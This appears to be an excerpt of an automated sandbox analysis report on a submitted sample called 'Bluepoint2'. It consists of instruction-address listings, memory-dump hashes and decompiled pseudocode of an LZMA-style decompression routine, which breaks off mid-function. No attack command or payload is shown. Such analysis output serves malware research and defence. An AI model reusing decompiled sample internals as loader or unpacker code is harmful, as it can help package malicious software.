                                                                                                                                    0x00000000
                                                                                                                                    0x00406d5f
                                                                                                                                    0x00406d61
                                                                                                                                    0x00406d64
                                                                                                                                    0x00406dd5
                                                                                                                                    0x00406dd8
                                                                                                                                    0x00406ddb
                                                                                                                                    0x00406de2
                                                                                                                                    0x00406dec
                                                                                                                                    0x00000000
                                                                                                                                    0x00406dec
                                                                                                                                    0x00406d66
                                                                                                                                    0x00406d6a
                                                                                                                                    0x00406d6d
                                                                                                                                    0x00406d6f
                                                                                                                                    0x00406d72
                                                                                                                                    0x00406d75
                                                                                                                                    0x00406d77
                                                                                                                                    0x00406d7a
                                                                                                                                    0x00406d7c
                                                                                                                                    0x00406d81
                                                                                                                                    0x00406d84
                                                                                                                                    0x00406d87
                                                                                                                                    0x00406d8b
                                                                                                                                    0x00406d92
                                                                                                                                    0x00406d95
                                                                                                                                    0x00406d9c
                                                                                                                                    0x00406da0
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406dac
                                                                                                                                    0x00406daf
                                                                                                                                    0x00406dcd
                                                                                                                                    0x00406dcf
                                                                                                                                    0x00000000
                                                                                                                                    0x00406db1
                                                                                                                                    0x00406db1
                                                                                                                                    0x00406db4
                                                                                                                                    0x00406db7
                                                                                                                                    0x00406dba
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbf
                                                                                                                                    0x00406dc2
                                                                                                                                    0x00406dc4
                                                                                                                                    0x00406dc5
                                                                                                                                    0x00406dc8
                                                                                                                                    0x00000000
                                                                                                                                    0x00406dc8
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ffe
                                                                                                                                    0x00407002
                                                                                                                                    0x00407020
                                                                                                                                    0x00407023
                                                                                                                                    0x0040702a
                                                                                                                                    0x0040702d
                                                                                                                                    0x00407030
                                                                                                                                    0x00407033
                                                                                                                                    0x00407036
                                                                                                                                    0x00407039
                                                                                                                                    0x0040703b
                                                                                                                                    0x00407042
                                                                                                                                    0x00407043
                                                                                                                                    0x00407045
                                                                                                                                    0x00407048
                                                                                                                                    0x0040704b
                                                                                                                                    0x0040704e
                                                                                                                                    0x0040704e
                                                                                                                                    0x00407053
                                                                                                                                    0x00000000
                                                                                                                                    0x00407053
                                                                                                                                    0x00407004
                                                                                                                                    0x00407007
                                                                                                                                    0x0040700a
                                                                                                                                    0x00407014
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407068
                                                                                                                                    0x0040706c
                                                                                                                                    0x0040708f
                                                                                                                                    0x00407092
                                                                                                                                    0x00407095
                                                                                                                                    0x0040709f
                                                                                                                                    0x0040706e
                                                                                                                                    0x0040706e
                                                                                                                                    0x00407071
                                                                                                                                    0x00407074
                                                                                                                                    0x00407077
                                                                                                                                    0x00407084
                                                                                                                                    0x00407087
                                                                                                                                    0x00407087
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040711c
                                                                                                                                    0x00407120
                                                                                                                                    0x00407127
                                                                                                                                    0x0040712a
                                                                                                                                    0x0040712d
                                                                                                                                    0x00407137
                                                                                                                                    0x00000000
                                                                                                                                    0x00407137
                                                                                                                                    0x00407122
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407143
                                                                                                                                    0x00407147
                                                                                                                                    0x0040714e
                                                                                                                                    0x00407151
                                                                                                                                    0x00407154
                                                                                                                                    0x00407149
                                                                                                                                    0x00407149
                                                                                                                                    0x00407149
                                                                                                                                    0x00407157
                                                                                                                                    0x0040715a
                                                                                                                                    0x0040715d
                                                                                                                                    0x0040715d
                                                                                                                                    0x00407160
                                                                                                                                    0x00407163
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407203
                                                                                                                                    0x00407203
                                                                                                                                    0x00407207
                                                                                                                                    0x004075a5
                                                                                                                                    0x00000000
                                                                                                                                    0x004075a5
                                                                                                                                    0x0040720d
                                                                                                                                    0x00407210
                                                                                                                                    0x00407213
                                                                                                                                    0x00407217
                                                                                                                                    0x0040721a
                                                                                                                                    0x00407220
                                                                                                                                    0x00407222
                                                                                                                                    0x00407222
                                                                                                                                    0x00407222
                                                                                                                                    0x00407225
                                                                                                                                    0x00407228
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406df8
                                                                                                                                    0x00406df8
                                                                                                                                    0x00406dfc
                                                                                                                                    0x00407569
                                                                                                                                    0x00000000
                                                                                                                                    0x00407569
                                                                                                                                    0x00406e02
                                                                                                                                    0x00406e05
                                                                                                                                    0x00406e08
                                                                                                                                    0x00406e0c
                                                                                                                                    0x00406e0f
                                                                                                                                    0x00406e15
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e1a
                                                                                                                                    0x00406e1d
                                                                                                                                    0x00406e1d
                                                                                                                                    0x00406e20
                                                                                                                                    0x00406e23
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406e29
                                                                                                                                    0x00406e2f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406e35
                                                                                                                                    0x00406e35
                                                                                                                                    0x00406e39
                                                                                                                                    0x00406e3c
                                                                                                                                    0x00406e3f
                                                                                                                                    0x00406e42
                                                                                                                                    0x00406e45
                                                                                                                                    0x00406e46
                                                                                                                                    0x00406e49
                                                                                                                                    0x00406e4b
                                                                                                                                    0x00406e51
                                                                                                                                    0x00406e54
                                                                                                                                    0x00406e57
                                                                                                                                    0x00406e5a
                                                                                                                                    0x00406e5d
                                                                                                                                    0x00406e60
                                                                                                                                    0x00406e63
                                                                                                                                    0x00406e7f
                                                                                                                                    0x00406e82
                                                                                                                                    0x00406e85
                                                                                                                                    0x00406e88
                                                                                                                                    0x00406e8f
                                                                                                                                    0x00406e93
                                                                                                                                    0x00406e95
                                                                                                                                    0x00406e99
                                                                                                                                    0x00406e65
                                                                                                                                    0x00406e65
                                                                                                                                    0x00406e69
                                                                                                                                    0x00406e71
                                                                                                                                    0x00406e76
                                                                                                                                    0x00406e78
                                                                                                                                    0x00406e7a
                                                                                                                                    0x00406e7a
                                                                                                                                    0x00406e9c
                                                                                                                                    0x00406ea3
                                                                                                                                    0x00406ea6
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eac
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eac
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eb1
                                                                                                                                    0x00406eb1
                                                                                                                                    0x00406eb5
                                                                                                                                    0x00407575
                                                                                                                                    0x00000000
                                                                                                                                    0x00407575
                                                                                                                                    0x00406ebb
                                                                                                                                    0x00406ebe
                                                                                                                                    0x00406ec1
                                                                                                                                    0x00406ec5
                                                                                                                                    0x00406ec8
                                                                                                                                    0x00406ece
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed3
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406edc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ede
                                                                                                                                    0x00406ee1
                                                                                                                                    0x00406ee4
                                                                                                                                    0x00406ee7
                                                                                                                                    0x00406eea
                                                                                                                                    0x00406eed
                                                                                                                                    0x00406ef0
                                                                                                                                    0x00406ef3
                                                                                                                                    0x00406ef6
                                                                                                                                    0x00406ef9
                                                                                                                                    0x00406efc
                                                                                                                                    0x00406f14
                                                                                                                                    0x00406f17
                                                                                                                                    0x00406f1a
                                                                                                                                    0x00406f1d
                                                                                                                                    0x00406f1d
                                                                                                                                    0x00406f20
                                                                                                                                    0x00406f24
                                                                                                                                    0x00406f26
                                                                                                                                    0x00406efe
                                                                                                                                    0x00406efe
                                                                                                                                    0x00406f06
                                                                                                                                    0x00406f0b
                                                                                                                                    0x00406f0d
                                                                                                                                    0x00406f0f
                                                                                                                                    0x00406f0f
                                                                                                                                    0x00406f29
                                                                                                                                    0x00406f30
                                                                                                                                    0x00406f33
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f35
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f35
                                                                                                                                    0x00406f33
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f75
                                                                                                                                    0x00406f75
                                                                                                                                    0x00406f79
                                                                                                                                    0x00407581
                                                                                                                                    0x00000000
                                                                                                                                    0x00407581
                                                                                                                                    0x00406f7f
                                                                                                                                    0x00406f82
                                                                                                                                    0x00406f85
                                                                                                                                    0x00406f89
                                                                                                                                    0x00406f8c
                                                                                                                                    0x00406f92
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f97
                                                                                                                                    0x00406f9a
                                                                                                                                    0x00406f9a
                                                                                                                                    0x00406fa0
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f41
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f41
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa5
                                                                                                                                    0x00406fa8
                                                                                                                                    0x00406fab
                                                                                                                                    0x00406fae
                                                                                                                                    0x00406fb1
                                                                                                                                    0x00406fb4
                                                                                                                                    0x00406fb7
                                                                                                                                    0x00406fba
                                                                                                                                    0x00406fbd
                                                                                                                                    0x00406fc0
                                                                                                                                    0x00406fd8
                                                                                                                                    0x00406fdb
                                                                                                                                    0x00406fde
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe4
                                                                                                                                    0x00406fe8
                                                                                                                                    0x00406fea
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fca
                                                                                                                                    0x00406fcf
                                                                                                                                    0x00406fd1
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fed
                                                                                                                                    0x00406ff4
                                                                                                                                    0x00406ff7
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00407286
                                                                                                                                    0x00407286
                                                                                                                                    0x0040728a
                                                                                                                                    0x004075b1
                                                                                                                                    0x00000000
                                                                                                                                    0x004075b1
                                                                                                                                    0x00407290
                                                                                                                                    0x00407293
                                                                                                                                    0x00407296
                                                                                                                                    0x0040729a
                                                                                                                                    0x0040729d
                                                                                                                                    0x004072a3
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407395
                                                                                                                                    0x00407399
                                                                                                                                    0x004073bb
                                                                                                                                    0x004073be
                                                                                                                                    0x004073c8
                                                                                                                                    0x00000000
                                                                                                                                    0x004073c8
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739e
                                                                                                                                    0x004073a2
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407452
                                                                                                                                    0x00407456
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x0040747b
                                                                                                                                    0x00407482
                                                                                                                                    0x00407489
                                                                                                                                    0x00407489
                                                                                                                                    0x00000000
                                                                                                                                    0x00407489
                                                                                                                                    0x00407458
                                                                                                                                    0x0040745b
                                                                                                                                    0x0040745e
                                                                                                                                    0x00407461
                                                                                                                                    0x00407468
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407543
                                                                                                                                    0x00407546
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040717d
                                                                                                                                    0x0040717f
                                                                                                                                    0x00407186
                                                                                                                                    0x00407187
                                                                                                                                    0x00407189
                                                                                                                                    0x0040718c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407194
                                                                                                                                    0x00407197
                                                                                                                                    0x0040719a
                                                                                                                                    0x0040719c
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719f
                                                                                                                                    0x004071a2
                                                                                                                                    0x004071a9
                                                                                                                                    0x004071ac
                                                                                                                                    0x004071ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407490
                                                                                                                                    0x00407490
                                                                                                                                    0x00407493
                                                                                                                                    0x0040749a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040749f
                                                                                                                                    0x0040749f
                                                                                                                                    0x004074a3
                                                                                                                                    0x004075db
                                                                                                                                    0x00000000
                                                                                                                                    0x004075db
                                                                                                                                    0x004074a9
                                                                                                                                    0x004074ac
                                                                                                                                    0x004074af
                                                                                                                                    0x004074b3
                                                                                                                                    0x004074b6
                                                                                                                                    0x004074bc
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074c1
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074cb
                                                                                                                                    0x0040752b
                                                                                                                                    0x0040752e
                                                                                                                                    0x00407533
                                                                                                                                    0x00407534
                                                                                                                                    0x00407536
                                                                                                                                    0x00407538
                                                                                                                                    0x0040753b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040753b
                                                                                                                                    0x004074cd
                                                                                                                                    0x004074d3
                                                                                                                                    0x004074d6
                                                                                                                                    0x004074d9
                                                                                                                                    0x004074dc
                                                                                                                                    0x004074df
                                                                                                                                    0x004074e2
                                                                                                                                    0x004074e5
                                                                                                                                    0x004074e8
                                                                                                                                    0x004074eb
                                                                                                                                    0x004074ee
                                                                                                                                    0x00407507
                                                                                                                                    0x0040750a
                                                                                                                                    0x0040750d
                                                                                                                                    0x00407510
                                                                                                                                    0x00407514
                                                                                                                                    0x00407516
                                                                                                                                    0x00407516
                                                                                                                                    0x00407517
                                                                                                                                    0x0040751a
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f8
                                                                                                                                    0x004074fd
                                                                                                                                    0x004074ff
                                                                                                                                    0x00407502
                                                                                                                                    0x00407502
                                                                                                                                    0x0040751d
                                                                                                                                    0x00407524
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x004071c2
                                                                                                                                    0x004071c5
                                                                                                                                    0x004071fb
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732e
                                                                                                                                    0x0040732e
                                                                                                                                    0x00407331
                                                                                                                                    0x00407333
                                                                                                                                    0x004075bd
                                                                                                                                    0x00000000
                                                                                                                                    0x004075bd
                                                                                                                                    0x00407339
                                                                                                                                    0x0040733c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407342
                                                                                                                                    0x00407346
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00000000
                                                                                                                                    0x00407349
                                                                                                                                    0x004071c7
                                                                                                                                    0x004071c9
                                                                                                                                    0x004071cb
                                                                                                                                    0x004071cd
                                                                                                                                    0x004071d0
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d8
                                                                                                                                    0x004071db
                                                                                                                                    0x004071f1
                                                                                                                                    0x004071f6
                                                                                                                                    0x0040722e
                                                                                                                                    0x0040722e
                                                                                                                                    0x00407232
                                                                                                                                    0x0040725e
                                                                                                                                    0x00407260
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726d
                                                                                                                                    0x00407272
                                                                                                                                    0x00407272
                                                                                                                                    0x00407274
                                                                                                                                    0x00407277
                                                                                                                                    0x0040727e
                                                                                                                                    0x00407281
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072b1
                                                                                                                                    0x004072b4
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00000000
                                                                                                                                    0x00407328
                                                                                                                                    0x004072b6
                                                                                                                                    0x004072bc
                                                                                                                                    0x004072bf
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x004072c8
                                                                                                                                    0x004072cb
                                                                                                                                    0x004072ce
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072d7
                                                                                                                                    0x004072f0
                                                                                                                                    0x004072f2
                                                                                                                                    0x004072f5
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f9
                                                                                                                                    0x004072fb
                                                                                                                                    0x004072fe
                                                                                                                                    0x00407300
                                                                                                                                    0x00407302
                                                                                                                                    0x00407305
                                                                                                                                    0x00407307
                                                                                                                                    0x0040730a
                                                                                                                                    0x0040730e
                                                                                                                                    0x00407310
                                                                                                                                    0x00407310
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x00407317
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072e1
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072e8
                                                                                                                                    0x004072eb
                                                                                                                                    0x004072eb
                                                                                                                                    0x0040731a
                                                                                                                                    0x00407321
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00407321
                                                                                                                                    0x00407234
                                                                                                                                    0x00407237
                                                                                                                                    0x00407239
                                                                                                                                    0x0040723c
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407242
                                                                                                                                    0x00407244
                                                                                                                                    0x00407247
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724d
                                                                                                                                    0x0040724d
                                                                                                                                    0x00407250
                                                                                                                                    0x00407257
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00407257
                                                                                                                                    0x004071dd
                                                                                                                                    0x004071e0
                                                                                                                                    0x004071e2
                                                                                                                                    0x004071e5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f48
                                                                                                                                    0x0040758d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040758d
                                                                                                                                    0x00406f4e
                                                                                                                                    0x00406f51
                                                                                                                                    0x00406f54
                                                                                                                                    0x00406f57
                                                                                                                                    0x00406f5a
                                                                                                                                    0x00406f5d
                                                                                                                                    0x00406f60
                                                                                                                                    0x00406f62
                                                                                                                                    0x00406f65
                                                                                                                                    0x00406f68
                                                                                                                                    0x00406f6b
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x00407350
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407356
                                                                                                                                    0x00407359
                                                                                                                                    0x0040735c
                                                                                                                                    0x0040735f
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407364
                                                                                                                                    0x00407367
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736d
                                                                                                                                    0x00407370
                                                                                                                                    0x00407373
                                                                                                                                    0x00407374
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407379
                                                                                                                                    0x0040737c
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407385
                                                                                                                                    0x00407389
                                                                                                                                    0x0040738b
                                                                                                                                    0x0040738e
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x0040738e
                                                                                                                                    0x004075c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                                    • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                                                                    • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                                    • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
